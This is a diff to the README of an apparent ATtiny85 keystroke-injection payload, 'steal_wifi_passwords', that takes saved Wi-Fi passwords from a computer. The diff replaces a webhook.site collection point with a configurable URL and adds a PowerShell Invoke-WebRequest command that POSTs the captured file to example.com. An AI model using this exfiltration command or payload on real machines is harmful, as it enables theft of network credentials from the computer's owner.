jzyra/Attiny85Payload/payloads/steal_wifi_passwords/README.md

 # Objective

 Allows you to recover wifi passwords saved on the computer.

-This payload uses the site `https://webhook.site` to retrieve the files.
+# Data recovery

+The data will be sent to the URL with the following powershell command:

+    Invoke-WebRequest -Uri http://example.com -Method POST -InFile /tmp/data

 # Settings

-* __ID__ (mandatory) : Your identifier (obtainable from the URL) on the site: `https://webhook.site`.
+* __URL__ (mandatory) : The URL to which the file will be sent.